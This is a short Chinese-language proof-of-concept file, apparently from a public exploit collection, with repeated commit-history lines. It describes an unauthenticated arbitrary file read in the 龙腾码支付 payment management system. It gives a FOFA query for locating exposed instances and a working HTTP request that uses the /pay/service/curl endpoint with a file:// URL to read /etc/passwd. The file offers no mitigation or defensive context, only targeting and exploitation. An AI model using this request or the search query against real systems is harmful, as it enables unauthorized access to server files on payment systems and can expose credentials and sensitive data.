POC/wpoc/龙腾码支付/龙腾码支付payservicecurl任意文件读取.md

# 龙腾码支付payservicecurl任意文件读取

# 一、漏洞简介
龙腾码支付管理系统存在未授权的任意文件读取漏洞

# 二、影响版本
+ 龙腾码支付

# 三、资产测绘
+ fofa`body="/epaydoc/epaydoc.php"`

# 四、漏洞复现
```plain
GET /pay/service/curl?url=file:///etc/passwd HTTP/1.1
```
Update 龙腾码支付payservicecurl任意文件读取.md 2025-04-21 09:06:57 +08:00			`# 龙腾码支付payservicecurl任意文件读取`
Create 龙腾码支付payservicecurl任意文件读取.md 2025-04-21 09:05:30 +08:00
Update 龙腾码支付payservicecurl任意文件读取.md 2025-04-21 09:06:57 +08:00			`# 一、漏洞简介`
			`龙腾码支付管理系统存在未授权的任意文件读取漏洞`

			`# 二、影响版本`
			`+ 龙腾码支付`

			`# 三、资产测绘`
			+ fofa`body="/epaydoc/epaydoc.php"`

			`# 四、漏洞复现`
			```plain
			`GET /pay/service/curl?url=file:///etc/passwd HTTP/1.1`
			```